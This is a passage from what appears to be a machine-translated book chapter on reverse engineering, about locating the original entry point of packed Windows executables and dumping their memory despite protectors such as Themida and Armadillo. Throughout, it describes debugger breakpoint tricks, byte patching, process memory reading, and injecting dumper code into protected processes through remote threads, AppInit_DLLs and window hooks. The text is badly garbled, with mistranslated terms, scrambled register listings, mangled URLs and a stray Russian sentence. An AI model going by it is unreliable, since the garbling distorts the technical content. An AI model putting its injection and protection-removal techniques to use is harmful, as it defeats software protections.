Pushset, atunci adresa de retur va fi în partea de sus a stivei, care este din nou ușor deprogramat la un punct de oprire condiționat Managementul poate fi, de asemenea, transmis prin Moch EAX, offset OEP/JMPEAX Aceste opțiuni sunt ușor de controlat și de urmărit, dar suntem neputincioși împotriva comenzilor „directe” JMPOffseet sau JMP [OER] În plus, numărul de opțiuni este prea mare și necesită mult timp Lucrările false suntinevitabile!Încercați să vă întoarceți cu FSG La un moment dat, se pare că nu există nicio soluție și afacereanoastră este proastă, dar nu este așa!Cert este că pachetele populare, precum și o parte semnificativă a protectorilor,nevrând să se amestece cu codul programului ambalat, este plasat într -o secțiune separată (sau nu secțiunea), plasatefie înainte de programul ambalat, fie după!Astfel, codul Packager este concentrat într -un singur loc (mai multe locuri)și nu se intersectează niciodată cu codul programului despachetat!Pare a fi un fapt evident De câte ori am trecut de el,fără să ne gândim măcar că el vă permite să automatizați complet procesul de căutare pentru OER!Aruncați o privire lacardul de memorie din nou (listarea ) Listarea Două secțiuni ale programului ambalat Mar Notepad-FSG B: COD RW NOTEPAD-FSG B: Cod RW vedem două secțiuni aparținând unuiprogram ambalat Înțelegeți care dintre ele este secțiunea de cod și care este secțiunea de date este imposibilă la primavedere, mai ales că ar trebui să existe o altă secțiune - o secțiune de resurse Cu toate acestea, Packerul insidios le-a combinat cumva unul cu celălalt, Cu toate acestea, codul lui Packer însuși, așa cum am văzut deja, este concentrat în spațiul de ] xxh și nu creeazăo secțiune separată pentru noi înșine pentru a elimina supravegherea inutilă a depanatorului, ne vom concentra pe gamade adrese aparținând programului ambalat, adică, de la începutul primei secțiuni până la sfârșitul ultimului, controlândautomat valoarea registrului EIR la fiecare operație a punctului de oprire În acest caz, pare așa cum se arată în lista Listarea L Secvența „magică” care ne conduce la BPM ESP- dacă eir oer> x && eir pentru a merge la modul hex, apoi- (antet) și (trecerea la punctul deintrare la POMT-ul de intrare a fișierului, er )Ne amintim de conținutul octetului de sub cursor (cel mai bine este să-l scriem doar pe hârtie), să intrăm în modul de editare apăsând și să introducem SS Păstrăm modificările apăsândtasta și ieșim Debuggerul Softice trebuie să stabilească preliminar modul de suprafață pentru Oz (Team IznyaeON) Lansăm programul fără a folosi cizme și ajungem la Softice, care cu siguranță trebuie să apară, altfel ceva nu esteîn regulă aici Acum este necesar să returnați octetul corectat în loc Acest lucru se face astfel Oferim comanda WDpentru a afișa fereastra Dumpa (cu excepția cazului în care este afișată pe ecran), apoi comanda DB, astfel încâtafișajul să treacă prin octeți (începătorii să fie mai convenabili) și, în sfârșit, să introduceți comanda Deir- Valoarea EIR ar trebui să fie redusă de o unitate, deoarece softice se oprește după CCH, crescând EIR peunitate Acum oferim comanda E și edităm groapa în modul interactiv, schimbând SS în valoarea înregistratăanterior Rămâne doar pentru a ajusta registrul EIR Acest lucru se face după cum urmează: G eir = eir - Totul!Comandă (Punct) Actualizează fereastra Dizassembler, nu confund cu OER, pe care trebuie să o găsim doar partea V a cocompaucheriei practice în poziția actuală Acum puteți depana programul Încet?Necunoscut?O grămadă deoperațiuni suplimentare?Ei bine, operațiunile sunt și mai puțin rele, pentru că sunt de același tip, iar macro -urilepot fi create pentru ei Este mult mai rău că unele pachete/protectoare controlează integritatea fișierului, refuzând săînceapă dacă acesta este schimbat Ce să faci atunci?Iată a doua cale, mult mai convenabilă și mai elegantă Încărcămprogramul (defect) pentru a fi Hiew și mergem la modul hexadecimal, apoi faceți clic pe tasta și calculați punctulde intrare adăugând EntryPoint RVA (în cazul nostru, h) cu bază de imagine (în cazul nostru, îooooooh) Drept urmare, valoarea este îoicoih Dacăluați în considerare lenea, puteți pur și simplu să apăsați tasta , astfel încât H W să ne transfere la punctul deintrare, raportând adresa sa Ok, se primește adresa punctului de intrare Apelăm Softice apăsând combinația de tastatură + și setăm punctul de oprire pe orice funcție ARI pe care programul nostru o provoacă la un moment dat Poate fiGetModuleHandlea (BPX GetModuleHandlea) și CreateFileA - indiferent!Plecăm Softice și începem programulnostru Debuggerul apare După ce ne-am asigurat că colțul inferior drept reflectă numele procesului nostru (dacă nu,lăsăm Softice și așteptăm următoarea predare), setați punctul hardware al opririi pe EP, oferind comanda B-RH x X, unde x este adresa punctului de intrare la re-fișier Lăsăm Softice și repornim programul Vă rugăm să reținețică Softice își amintește punctele instalate în contextul acestui program și nu le șterge nici după finalizareaacestuia Cu reporniri repetate (și toate ulterioare), softice se va opri ascultător la EP Ei bine, nu este grozav?!Notăbibliotecile dinamice care au compilat static cu programul recepție de gestionare înainte de punctul de intrare Acestlucru permite protecției să întreprindă unele acțiuni chiar înainte de începerea depanicării „Prin urmare, dacă ceva numerge bine, mai întâi verificați codul conținut în funcțiile D Imaz P toate Bibliotecile dinamice, aici suntem și auînvățat să găsească OER Cel mai mic este cel mai mic - pentru a arunca gropile de depozitare ale programului pe disc Daraici nu totul este atât de simplu pe cât ar putea părea la început și multe pachete/protectoare rezistă la acest modposibil În secțiunea următoare, vom arăta cum să implementăm un amortizor universal care poate despacheta nu numaifișierele executabile, ci și DLL Printre altele, Dumper -ul propus ocolește mecanismul avansat de criptare dinamică,cunoscut cu numele de sorumet, cu care întregul program este criptat, iar paginile individuale de memorie suntdescifrate imediat înainte de utilizarea lor, apoi criptate din nou În cele din urmă, vom atinge restaurarea tabeluluide import Tehnica de eliminare a dumpului din aplicații protejate În secțiunea anterioară a acestui capitol am trecutprin despacker, ajungând la punctul de intrare inițial și acum, pentru a învinge în sfârșit apărarea, trebuie săeliminăm haldele Există multe utilități destinate în acest scop, dar departe de a fi întotdeauna obținute de depozitelede gunoi sunt eficiente In caz contrar?Să încercăm să ne dăm seama!Treceri precum Themida (Protector Extrame anterior)și Star-Force, care sunt protejate de multe programe populare, foarte profund „mușcă” în sistemul de operare, carereduce productivitatea și generează BSOD-uri frecvente Unii alți protectori nu se comportă atât de agresiv, dar existăîncă suficiente probleme de compatibilitate, în special atunci când treceți la sisteme de operare pe de biți sauprocesoare multi-core, care sunt semnificativ diferite de cele sub care protecția a fost proiectată activ folosindoportunități nedocumentate De câte ori v -ați repetat în lume - nu folosiți nimic subestimat adevăr, această tehnicănu funcționează pe unele fișiere sigure cu o structură de titlu distorsionată Capitolul Lupta împotriva pachetelor în aplicații comerciale, dar numai BCș nu este pentru viitor!Așadar, trebuie să preiați instrumentele de hackeri șisă scăpați de protectori, chiar și atunci când programul este cumpărat în mod legal și nu este necesar să îl„rupeți” Dar asta este!Cât de ciudată este aranjată lumea Cazuri simple de îndepărtare a Dump își vor imagina căUnpacker a funcționat deja, suntem la punctul inițial de intrare (OER) și suntem gata să salvăm depozitele SofticeDebugger nu oferă o astfel de oportunitate, așa că trebuie să acționați printr -un sens giratoriu În primul rând, estenecesar să aflați ce adresă a adresei ar trebui salvată Cu condiția ca protecția să nu întreprindă acțiuni ostile,informațiile necesare pot fi obținute prin comenzile MOD și MAR (Fig și listarea ) I eax = ѳѳ е EBX = FFDF I EDI = EBP = FFC CS = B DS = SS = в: = ES = FS = GS = OOOO BYTE E - C - BE -E B B F FF ' E B E BE -C B C F E B C PROT - ( •) -ho'e s v eees -u h'e uusk , I Când â ■ PR T - Apelați POP ECX B: V: B V: C B: D B: E B: F B: B: B: (PassIUE) -KTEB ( E ) -TID ( B )–Dest Dump! text+ - NOP NOP NOP PUSH PUSH HOU ЕВХ Е І, Ѳ hHod Base PEHeader Hodule Name test dump :MAP test dump Owner Obj Name test dump data Obj# Address B: : : Ѳ ВЧ E DE cod idata r idata ru ris Determinarea regiunii de memorie pentru aelimina Dump : M D Test - Dump # Determinați adresa de bază a încărcării modulului în memoria HMOD BASE BASEPEHEHEHEDULE Nume nume de fișier d dum \ test dump exe: Mar test dump # # dimensiunea adreseiTust dump Text V: v Code ro test dump Rdata : E IDATA RO TEST DUMP DATA : DE IDATA RW Considerăm enumerarea în mai multe detalii Aici este test dunț) -numele procesului din care vom elimina groapa (softice îl afișează în colțul din dreapta jos al ecranului) Adresa debază a încărcării (baza HMOD) este situată la H Ultima secțiune ( Data) începe Partea V Cord -Cord-Capacitate cu adresa H și continuă până la adresa H+IDE H) == DE H Astfel, trebuie să salvăm de hocteți de memorie, începând cu ooooo Dar nu există o astfel de echipă în Softice!Dar există o istorie a echipelor(istoricul comenzilor) Pentru utilizarea sa eficientă, este recomandat să crească pre -dimensiunea istoriei echipelor lacel puțin MB Pentru a face acest lucru, selectați Editare din meniul echipei |Setarea de inițializare a ghețiisoftice |Mărimea tamponului de istoric Dăm comanda DB L DE , lăsăm debuggerul, pornim încărcătorul simbolului șidăm comanda fișierului |Salvați istoria softice ca Drept urmare, se formează un fișier text (listarea ), caretrebuie transformată într -un fișier executabil, pentru care trebuie să scrieți un utilitar special sau să căutați celterminat Iistig , Dump Memory, preluat prin istoricul comenzilor: DB L DE : D A : B : E F BA : : : : : : D CD- SCD - - E D D OA- FF MZP @ ! , L ! e e f este promam canno f t să fie rulat în Modul DOS $ Ca opțiune, puteți utiliza pluginul ixext gratuit (http://stenri pisem net/), extinzând semnificativfuncționalitatea softice Dacă ICEXT refuză să înceapă, creșteți dimensiunea grămadă și stiva la octetul H, editareaurmătoarei sucursale a HKLM \ System \ CurrentControlset \ Services \ ntice Echipa de idump (Fig și listarea ) vă permite să economisiți blocuri de memorie pe disc în formă binară, ceea ce este foarte convenabil EAX = E EBX = FFDF ECH = V EDX = ESI = EDI = OOOOOOOO EBP = FFC ESP = FF EIP = O D I SS = SS = SS = SS = ss = ss = ss = ss = ss = ooooo gunoi - - Prot - (") - : A - FF FF MZE - : B * @ T : - RRPTZ? -CALL POP RET NOP NOP PUSH PUSHMOU ECX V: B: B B: C B: D C: V: : V: V: ( Dump Memory to Disk • Dump nume de fișier addr len ex: idumpc: \ dump dat ѳѳѳ idump \ ?? \ c: \ dump dat idump \ ?? \ dump dat edx+ebx ecx: idump: IdumpC: \ Dumped de Dump: \ ?? \ C: \ Dumped de FHSWîm?Orez Îndepărtarea gropii de pe softicefolosind plug -ul ixext -in Lupta împotriva pungilor ■ ysting Memoria memoriei filmate de Pluginul DumpIcext:! Dump Dump Memory to Disk idump nume de fișier addr len ex: idump c: \ dump dat idump \ ?? \ c: \ dump dat idump \ ?? \ c: \ dump dat edx+ebx Ecx:! Dump C: \ Dumped de Dump: \ ?? \ C: \Dumped de Alte plugin - Icedump (http://programmerstools org/system/files? File = IEDUMP zip) știe, deasemenea, să păstreze gropile de memorie La fel ca Icext, Icedump este distribuit gratuit împreună cu texteleoriginale Dumpurile primite pot fi încărcate în IDA Pro Dizassembler, dar este mai bine să vă abțineți de la pornireaacestuia, deoarece pentru munca corectă este necesară restaurarea tabelului de import și a resurselor Restaurareatabelului de import și resurse este o problemă extrem de extinsă, care merită o discuție separată Nu o vom lua înconsiderare în detaliu, ci doar să rețineți că, în acest scop, puteți utiliza una dintre utilitățile finite:reconstructor de import (http://www wasm ru/baixado php?mode=tool&id= ) va restaura importurile importurilor , șiResource Repuilder (http://www wasm ru/baixado php?mode=tool&id= ) - Resurse Pentru debuggerul Ollydbg, există unplugin Ollydump (http://dd x-eye net/file/ollydump zip) cu un importator încorporat de tabel de import (Fig ) Orez Îndepărtarea gropii în Ollydbg folosind pluginul Ollydump Partea V Capacitatea de cod practicpoate fi utilizată în sfârșit de un fel de mâncare autonom Primul (și cel mai puțin succes) automat a fost Procdump,apoi a apărut Lord Re-Utility, ținând cont de experiența amară a predecesorului său și capabilă să mențină depozitelechiar și în cazurile în care revolumul este distorsionat în mod deliberat de protecție și acces la Unele pagini dememorie lipsesc (este stabilit un atribut PAGE NOACCESS) Coroana de evoluție a fost instrumentele Dumper PE (Fig ), cu care vom lucra Setul de bază de livrare poate fi găsit pe aproape orice server hacker, de exemplu, pe WASM(http://www wasm ru/bakeado php?mode=tool&id= ) sau la cracklab (http: // www cracklab ru/download phpOrez Utilitatea instrumentelor PE Dacă lucrăm cu debuggerul de nivel aplicat (de exemplu, ollydbg) șistăm în OER, atunci este foarte simplu să eliminați depozitele din program Este suficient să treceți la instrumentelePE, să selectați procesul dorit din listă și să dați comanda completă Cu toate acestea, cu debuggerii nucleului(Softice, Microsoft Kernel Debugger), acest lucru nu va fi posibil să faceți acest lucru și, prin urmare, trebuie săfaceți viclen Ne amintim (cel mai bun -scris pe hârtie) primii doi octeți, numărați de la începutul OER și scriem Ebfehîn locul lor, care corespunde instrucțiunilor de mașini de la JMP Short $ - , care prinde procesul Acum puteți părăsi însiguranță debuggerul, accesați instrumentele PE, eliminați depozitele și apoi puteți restabili octeți originali în oriceeditor echic Pachetele obișnuite (de exemplu, UPX) nu rezistă la eliminarea Dump, deoarece lupta împotriva hackerilor nueste inclusă în sarcina lor Un alt lucru este protectorii De fapt, acestea sunt aceleași ambalaje, dar echipate cu unarsenal de mecanisme anti -acțiune Tehnicile de protecție pot fi împărțite în activ și pasiv Pasiv includ toate celecare funcționează doar în stadiul de despachetare și nu interferează în funcționarea programului în sine sau înfuncționarea sistemului de operare Protecția activă interceptează funcțiile ARI din interiorul spațiului de adreseCapitolul Lupta cu pachetele din din procesul protejat sau chiar instalează un driver special care modificănucleul sistemului de operare, astfel încât eliminarea directă a depozitului devine imposibil Efectul secundar evidental protecției active este neînsuflețitul lor cu noile versiuni de Windows, ceea ce duce adesea la prăbușirea sistemuluide operare Cel mai trist lucru este că, prin lansarea programului de configurare exe, utilizatorii nici măcar nususpectează ce creatură poate cuiba acolo, mai ales că nu toți protectorii susțin deinstalul corect În căutarea eiînșiși, eliminarea dumpului începe cu definiția unei regiuni de memorie aparținând fișierului executabil (saubibliotecii dinamice) Tehnicile descrise anterior se bazează complet pe re-tablete și pe tabelul secțiunilor utilizatede sistemul de operare aproape doar în faza de descărcare a fișierelor În special, ne interesează câmpurile ImageBase(adresa încărcăturii de bază), sizeoflmage (dimensiunea imaginii) și conținutul tabelului secțiunii Protectorii adoră sășteargă aceste câmpuri după finalizarea despachetării sau completării lor, evident, valori incorecte Primele amortizoarede generare au înnebunit din acest lucru, dar instrumentele PE, în majoritatea cazurilor, restabilesc informațiile carelipsesc de unul singur Cu toate acestea, situațiile sunt posibile atunci când nici măcar instrumentele PE nu suntcapabile să facă față sarcinii sale Ce să faci în astfel de cazuri?Cel mai simplu lucru este să studiați cardul dememorie al procesului studiat returnat de funcția VirtualQuery/Virtualqueryex ARI Regiunile marcate ca mem image aparținfișierului executabil sau unul dintre DLL -urile utilizate de acesta În instrumentele PE pentru construirea unui card dememorie Echipa Regiunii Dump răspunde (Fig ) Orez Vizualizarea cardului de memorie în protecția activă PE tols poateintercepta aceste funcții transmitând date de fals și apoi trebuie să coborâți nivelul nivelului, întorcându -se lafuncția ntqueryvirtualmemory, care, după cum urmează, din numele său, există doar în Sisteme de operare asemănătoare cuNT și exportate de biblioteca ntdll dll Cu toate acestea, în unele cazuri, ea, forțându -ne să apelăm la funcțianedocumentată a NTQuerySystymlnformation, interceptele Multă vreme, a rămas complet nedocumentat și mulți protectorinici nu au bănuit existența unei astfel de lacune Acum descrierea sa este disponibilă pe MSDN: http://msdn microsol`t com/en-us/library/ms aspx, cu un avertisment formidabil că comportamentul funcției se poateschimba în orice versiune nouă și, prin urmare, în Pe termen lung este mai bine să nu vă bazați pe produsele de peacesta Partea V Cord -Cord -Cord în cazul extrem (dacă este interceptată și NTQuerySystyminformation), trebuie sărecurgeți la analiza manuală a structurilor de date legate de procesul de proces (acest lucru este exact ceea ce seface) Cu toate acestea, este mult mai ușor și mai fiabil să copiați doar fragmentul dorit din spațiul de adrese Dacăimaginea nu a fost mișcată, atunci adresa de bază a sarcinii va fi aceeași ca în fișierul re-înapoi Atunci când lucrațicu o manieră contestată, adresa de bază trebuie să fie determinată manual prin căutarea semnăturilor REA și MZ, trecândde la OER (adică spre adrese mai tinere) Pentru fericirea noastră, protecția nu poate șterge complet reexecutarea, deatunci unele funcții ARI care interacționează cu resursele etc , vor înceta să funcționeze, dacă nu oricare dintremodalitățile de a determina limitele imaginii, trebuie să umezi fragmente din Adresa spațiului, încărcarea lor în IDAPro ca fișiere binare, desigur, menținând în același timp adresa inițială a fragmentului Pentru a analiza funcționareamecanismului de protecție a acestui lucru în majoritatea cazurilor, este suficient, mai ales că IDA Pro vă permite săîncărcați fragmentele lipsă din „RAID” Se aruncă din exterior înainte de a citi spațiul de adresă al procesuluialtcuiva, încă nu a fost atins Windows izolează procesele unul de celălalt în cazul unei „lovituri” neintenționate dinmemorie (care a enervat puternic utilizatorii Windows x), dar oferă un set special de funcții ARI pentru interacțiuneainter-proces Calea clasică: obținem un procesor de proces, al cărui depozite pe care urmează să -l salvăm, să apelăm laOpenProcess și să transmitem funcțiile sale de readprocessmory cu restul parametrilor (indicând câți octeți și unde artrebui să fie luați în considerare) Ar trebui să fie avut în vedere faptul că unele pagini pot fi marcate cu protecțieca inaccesibilă, iar înainte de a le contacta, este necesar să apelați funcția VirtualProtectEx, permițând accesulcomplet (page execute readwrite) sau cel puțin deschiderea paginii numai la citire (pagină readonly) Desigur, funcțiileOpenProcess/ReadProcessMemory/VirtualProtectEx pot fi interceptate de protecție, iar apoi în loc de Dumpet obținem oeroare de sistem sau chiar un ecran albastru Funcțiile de nivel scăzut aleNTOPENPROCESS/NTREADVIRTUALMEMEMORY/NTPROTECTVIRALMEMEMORY Știri cu aceeași ușurință, în plus, o anumită protecțieschimbă markerul de proces, care interzicea deschiderea memoriei sale pentru citirea chiar și a unui administrator!Secrede că eliminarea gropei de la nivelul nucleului deschide oportunități mari de hacking și este imposibil de rezistatacest lucru, deoarece șoferul lucrează cu cel mai înalt nivel de privilegii, ceea ce permite absolut totul De fapt,războiul de șoferi pentru nucleu abia începe Nu puteți merge departe pe procesorul „gol”, iar șoferul de amortizare esteobligat să apeleze la funcțiile de serviciu ale nucleului Mai mult, nu există funcții documentate pentru citireamemoriei procesului altcuiva (cu excepția noului menționat) în sistem!Pentru a citi direct procesul procesului, șoferultrebuie să se conecteze la acesta, provocând funcția Keattachprocess sau analogul său modern al KestackTtachProcess,care a apărut și documentat pentru prima dată în Windows Ar trebui să fie utilizat cu cea mai mare precauție șiînainte de a se conecta la un alt proces , trebuie să vă deconectați de la cea actuală, apelând lakedetachprocess/kestackdeattachprocess Cu toate acestea, aceste funcții pot fi interceptate prin protecție cu toateconsecințele care urmează (banda de rulare temida face exact asta) Este important de menționat că metodele deinterceptare universale nu există - protectorul poate modifica tabelul de export, poate introduce instrucțiunile JMP laînceput sau chiar la mijlocul funcțiilor de serviciu ale nucleului, etc Aceasta înseamnă că nu ne putem baza Pe bază debază și avem doar două opțiuni: avem doar două opțiuni: să utilizăm acele funcții care nu au ghicit să interceptezeprotecția sau să comutăm manual spațiile de adresă Plugin special la PE Instrumente (http://petools org ru/petools shtml/extredmedumper zip,http://www wasm ru/pub/ /files/dumping/extredmedumper rar) la procesul prin gpava Luptare Cu cele de pachete,următorul lanț de servicii apelează la psLookuppRapessByProcessid OBOPENOBJECBYPOINCER ► OBDEREFERENEOBJECC pe carenimeni nu l -a interceptat încă, ceea ce permite ca depozitul să fie eliminat chiar și din programe foarte puternicprotejate Cu toate acestea, este dificil să spunem cât de mult poate ține această metodă Creatorii protectorilor nu suntinactivi și există și forumuri de hacker Pe termen lung, este cel mai fiabil să folosiți un subcurent (și, de asemenea,neexportat!) Funcția Kiswapprocess, a cărei adresă se schimbă de la sistem la sistem, ceea ce face dificilăinterceptarea În același timp, amortizorul îl poate determina cu ușurință prin intermediul caracterelor de depanaredistribuite de Microsoft Pentru a lucra cu ei, veți avea nevoie de un dbghelp dll din kitul de instrumente de depanare(http://www microsoft com/whdc/devtools/ debuging/defeit mspx) și utilitatea Symchk exe, luate din același mod FuncțiaKiswapprocess este una dintre cele mai scăzute funcții de nivel care funcționează direct cu registrul PPE, în careindicatorul este introdus pe paginile procesului selectat, după care spațiul său vizat poate fi citit ca propria comandăMOVSD Machine, într -un Apropierea aspră a unui analog al memcpy Anticipând un astfel de rezultat al evenimentelor,unele apărări au mers pe un pas disperat: interceptarea Swapcont-Exc și o serie de alte funcții care lucrează cu PPE, auînceput să distrugă catalogul paginilor „procesului” în timpul procesului de comutare a contextelor și restabiliți -ldin nou când este necesar Barbarie!Un apel la catalogul de pagini provine din zeci de funcții fără documente, care înfiecare versiune a nucleului sunt implementate în felul său Și acest lucru înseamnă că o astfel de politică de protecțieagresivă riscă să conducă la BSOD continuu, ceea ce nu lasă nicio șansă pentru munca normală!Dar chiar și acesta nu estecel mai rău Din ce în ce mai mulți protectori trec la despachetarea dinamică, descifrarea paginilor în timp ce seîndreaptă spre ele, apoi le criptează din nou Chiar dacă trecem prin protecție și ne bazăm pe proces, nu va fi nimic desalvat în groapă Mai precis, depozitele primite vor fi aproape % criptate Mecanismele de decodare dinamică aalgoritmului de decodare dinamică, implementat în protectorul Armadillo și cunoscut de numele Sorumet, arată astfel:Protecția dă naștere procesului de depanare, transmitând funcțiile Creacceprocess ca numele argumentului liniei decomandă zero „Mulțumesc”, sunt afișate două exemplare ale unui program de rulare în dispecerul de sarcini Unul dintre eieste serverul (condiționat), celălalt este clientul Serverul prin funcția VircaalProceccex face ca toți cliențiiclientului să fie inaccesibili (atribut page noaccess) și transferează controlul asupra lui, așteptând evenimente dedepanare folosind funcția WaitforDebugevent Evenimentele nu se forțează mult timp, iar la prima încercare de a îndeplinicodul în pagina inaccesibilă, o excepție este excitată, transmitând domnia domniei către server Serverul descifreazăpagina curentă, interacționând cu clientul prin funcția ReadProcessMemory/WriteProcessMory ARI, stabilește atributele deacces necesare și returnează clientul clientului Restul paginilor rămân criptate, iar atunci când le contactează,excepția este din nou emoționată, care este transmisă serverului prin intermediul wa^twedgevent Serverul cripteazăpagina anterioară, selectând toate atributele de acces pe care le are doar și descifrează pagina curentă care aemoționat excepția În practică, pentru a crește performanța, protecția acceptă o memorie cache primitivă, permițândclientului să aibă mai multe pagini decriptate în același timp Necesitatea unui server de proces al datoriei esteexplicată prin faptul că, într-un mod diferit, de a prinde excepții la nivel aplicat pur și simplu nu se poate Dar cezici de mecanismul excepțiilor structurale (SEH)?Ne înregistrăm propriul procesor și prindem excepțiile, după cum sespune, la locul apariției Acest lucru ne elimină de la furnizarea de inter-procesare a apelurilor ari, care suntinterceptate elementar de hacker Vai!Dacă aplicația protejată folosește mecanismul SEH (și marea majoritate aaplicațiilor îl folosesc), capacitatea noastră de cordon din Partea V va fi blocată de alții Față de excepția„noastră”, pur și simplu nu va ști ce să facă cu ea și, cu o probabilitate apropiată de unitate, va completa pur șisimplu aplicația în modul de urgență Teoretic, instalarea noului handler este ușor de urmărit prin instalarea punctuluihardware al accesului la memorie la adresa FS: [oooooooh] Sistemele de operare Windows NT permit programelor deaplicații să manipuleze cu registrele de depanare prin context și Registrul de depanare acționează numai în cadrul procesului „” său, fără a interfera cu lucrul la toți ceilalți DarWindows X „uită” să păstreze registrele de depanare în contextul procesului „lor” și dobândesc un personaj global careafectează toate procesele!Deci, în Windows x, acest truc nu trece Și iată o altă metodă: setăm driverul careinterceptează nivelurile IDT și interacționând cu procesul său fie prin Devicelocontrol, fie prinNTRAIDVIRTUALMEMERY/NTWRI TEVIRTUALMEMORY/KELEDEATTACHPROCESS/KEATTACHPROCESS Această abordare este destul de fiabilă,cu toate acestea, scrierea șoferilor este o lecție laborioasă În plus, șoferii de lucru incorect provoacă adeseaapariția BSOD În cele din urmă, dezvoltatorul de apărare va refuza în mod clar să sprijine Windows X (care este încă înviață!), Sau va implementa două drivere simultan!Cu toate acestea, protecția acestui tip este încă găsită Indiferent demodul în care are loc prelucrarea excluderii, este foarte simplu să rupi o astfel de protecție!Citim prima pagină,așteptăm sfârșitul decodării, o salvăm pe disc, apelăm la pagina următoare și acționăm așa până când întreagaimagine este în mâinile noastre Unul trebuie doar să introducă codul Dumper în spațiul de adrese al procesului protejatși va fi foarte dificil pentru protector să distingă apelurile programului în sine de apelurile de vapori Versiunilerecente ale benzii de rulare Armadillo, redenumită recent Pașaportul software, implementează un mecanism mult maifiabil, deși extrem de scăzut de performanță a decriptării de urmărire, în care întregul cod de program estecriptat Serverul urmărește clientul, decriptează o instrucțiune simultan (instrucțiunea anterioară este criptată) Nu maieste posibil să eliminați haldele prin abordarea mecanică a memoriei, deoarece apărarea este interesată doar deexcepțiile care apar în timpul performanței Tot ce putem face în acest caz este să „pană” între aplicația criptată șidecodificatorul, „colectarea” instrucțiunilor decriptate care formează ruta fluxului de implementare Deoarece esteaproape imposibil să se realizeze % din acoperirea codului, depozitul obținut va fi inferior În ciuda acestui fapt,există o mică nuanță Decriptarea scrisă nu poate utiliza nici bloc, nici criptoalgoritmi dependenți de contextual,deoarece decodificatorul de urmărire nu știe niciodată în prealabil ce instrucțiuni vor fi urmate de următoarele Doaralgoritmii de flux rămân ca un Xor sau RC , care sunt foarte ușor de descifrat Pentru a face acest lucru, trebuie doarsă găsiți o gamă pe care banda de rulare, în ciuda niciunui eforturi, nu va putea să se ascundă prea profund!În modfiresc, procesul de eliminare a gropilor în acest caz nu va mai fi complet automatizat și va trebui să recurgeți laDizassemble și poate chiar să depanați Din fericire, astfel de scheme de protecție nu au câștigat pe scară largă și estepuțin probabil să o primească în viitorul previzibil Trasarea încetinește viteza aplicației de zece ori, ca urmare acăreia devine necompetitivă Dump din interior, eliminând groapa prin mecanismele interacțiunii inter -proces - aceastaeste ieri Pentru a combate protecția activă, hackerii introduc codul Dumper direct în procesul studiat, ceea ce văpermite să ocoliți atât interceptarea funcțiilor Ari, cât și să învingeți criptarea dinamică a tipului desorometru Классический способ внедрения кода реализуется так: открываем процесс функцией OpenProcess, выделяем блокпамяти вызовом VirtualAllocEx, копируем код дампера через WriteProcessMemory, а затем либо создаем удаленный потокфункцией CreateRemoteThread Гпава Борьба с паковщиками (толькона системах из семейства Windows NT), либо изменяем Registrul EIR în contextul fluxului altcuiva, referindu -se lafuncția setthreadContext (funcționează pe toate sistemele) Desigur, valoarea anterioară a EIR trebuie păstrată, iarfluxul în sine - s -a oprit Aștepta!Dar acest lucru nu este mult diferit de interacțiunea inter -procesobișnuită!Funcțiile ntalocatevirtualmememory/ntsetcontexthead/ntcreathead puya pubia steppares imed!Nu există nicioeroare aici, Funcția Ari CreatemoteThread este de fapt un „înveliș” în jurul funcției nucleare NTCreateThread Ei bine,iată o altă cale clasică Plasim amortizorul în DLL și prescriem acest DLL în HKLI \ Software \ Microsoft \ Windows NT \CurrentVersion \ Windos \ Appinit Dllls, ca urmare a căreia va fi afișat pentru toate procesele care sunt în sistem șiînainte de a transfera controlul la Următorul proces lansat va primi primul management al DLL -ului nostru!Din păcate,nu numai protectorii, ci și alte programe (antivirusuri, firewall -uri personale) sunt cunoscute despre această ramură aregistrului și o urmează Recordul nostru poate fi șters înainte ca Dumper să înceapă să funcționeze!Dacă tot el Va fi posibil să obțineți gestionarea, primul lucru pe care ar trebui să -l facă este să alocați un bloc de memorie îninteriorul procesului, să copiați întregul cod necesar acolo și să returnați sucursala Appinit dlls în stareainițială Întrucât Damer primește control chiar înainte de începerea apărării, ea nu va putea afla că cineva a vizitatdeja aici Excepția este protecția activă a tipului de rezident, prezentă constant în sistem, chiar dacă fișierulprotejat nu a fost lansat Dar, în acest caz, se confruntă cu următoarea problemă - cum să distingem procesul „lor” detoți ceilalți?Pe numele fișierului?Acest lucru nu este prea fiabil este mai bine să folosiți „eticheta” - ocombinație unică de octeți la o adresă specifică Este foarte dificil să faceți față unei astfel de protecții, dar totușiposibilă Algoritmul oferit în atenția dvs ocolește toată protecția activă și pasivă existentă până în prezent: copiemfișierul original (cu protecție) în TMP TMP P, Deschidem fișierul original în Hiew, mergem la punctul de intrare (EP) șipunem JMP la locul liber, unde plasăm codul amortizorului, care, la primirea controlului, efectuează următoareleacțiuni: • Selectează Unitatea de memorie și își copiază corpul, de obicei încărcat de pe disc (este mai bine să nuîncărcați biblioteca dinamică, deoarece o anumită protecție controlează lista DLL, iar dacă apelul provine dintr -obibliotecă dinamică necunoscută, consideră că este o invazie) • Setează cronometrul prin funcția Ari de settimer, astfelîncât procedura de amortizare să primească control atunci când întregul cod este complet despachetat sau, ca în cazulSorumet, când apărarea are timp să stabilească un proces de depanare Desigur, nu va funcționa pentru a elimina depozituleficient în OER în acest caz, dar chiar și o astfel de groapă este mai bună decât nimic deloc • RenMines fișieruloriginal (cel care este executat în prezent!) În tmp xxx, iar fișierul TMP TMP returnează numele original • Se curăță dememorie, restabilește EP și transferă controlul unui program securizat • Dacă Active Protection își protejează fișierul,identificându -l prin semnătură, folosim un ambalator inofensiv cu un „efect secundar zero”, de exemplu, Upx Mai multdecât atât, toate acțiunile descrise ar trebui efectuate pe o mașină separată, evident, „sterilă” P Începeți un fișiermodificat pentru execuție Astfel, protecția nu va putea detecta modificări nici în fișier, nici în memorie De fapt,atunci când încearcă să stabilească numele fișierului curent, sistemul de operare va returna partea V Cord -Cord-Cord, numele fișierului pe care îl avea la momentul lansării, ignorând faptul „online” său redenumire Dar acesta estealgoritmul prea greoi, în plus, protecția activă nu costă nimic pentru a intercepta settimer și interzice instalareacronometrului în „proces” până la finalizarea decăderii/transferului de control către OER Este amuzant, dar multeapărări uită de funcția setwindowshookex, care vă permite să introduceți DLL -ul dvs în spațiul de adrese al procesuluialtcuiva Cu toate acestea, chiar dacă și -au amintit de ea, a efectua interceptarea corectă este foarte dificilă Multeaplicații legale (de exemplu, tastaturi multimedia sau șoareci cu butoane suplimentare) folosesc SetWindowShookex pentrua extinde funcționalitatea sistemului Nu există nicio modalitate de a distinge aplicația „cinstită” de TheDumper Protecția poate recunoaște faptul de a introduce DLL -ul altcuiva în spațiul de adrese al procesului săuprotejat, dar cum poate să știe ce face acest DLL?!Puteți, desigur, să îl descărcați din memorie (sau să prevenițiîncărcarea), dar ce utilizator va dori că programul achiziționat legal intră în conflict cu 